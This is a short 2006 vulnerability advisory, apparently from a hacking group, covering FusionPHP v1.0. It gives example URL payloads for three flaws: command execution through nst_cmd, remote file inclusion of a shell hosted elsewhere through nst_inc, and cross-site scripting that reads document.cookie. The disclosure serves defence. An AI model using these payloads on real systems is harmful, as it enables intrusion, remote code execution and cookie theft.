###########################################################################

Advisory #8 Title: FusionPHP Multiple Vulnerabilities

Author: 0o_zeus_o0

Contact: [email protected]

Website: www.elitemexico.org

Date: 01/03/2006

Risk: High

Vendor Url: http://fusionphp.net/forums/

Affected Software: FusionPHP

Non Affected:

We Are: olimpus klan team

#Info:
#================================================================
#this system contains three bugs of high risk for usuary the robbery of cookie

#(it allows the robbery of identity of some user), the filtration of remote archives

#(it allows the entrance of remote archives to the servant where is the system affecting),

#execution of commandos (this Vulnerability allows the execution of commandos locally,

#risking the information of the users)

#Example Command Execution:
#================================================================

#http://www.example.com/[news]/templates/headline_temp.php?nst_cmd=ls -la

#Example Remote File Inclusion:
#================================================================

#http://www.example.com/[news]/templates/headline_temp.php?nst_inc= http://www.example.com/shell.gif?

#Example Cross-Site Scripting:
#================================================================

#http://www.example.com/[news]/fullnews.php?id=&lt;script&gt;alert&#40; document.cookie);</script>

#Solution:
#================================================================

#reported the vendor or in elitemexico.org

#VULNERABLE VERSIONS
#================================================================
#v1.0 Other versions may also be affected.

#================================================================
#Contact information
#0o_zeus_o0
#[email protected]
#www.elitemexico.org
#================================================================
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
##############################################################################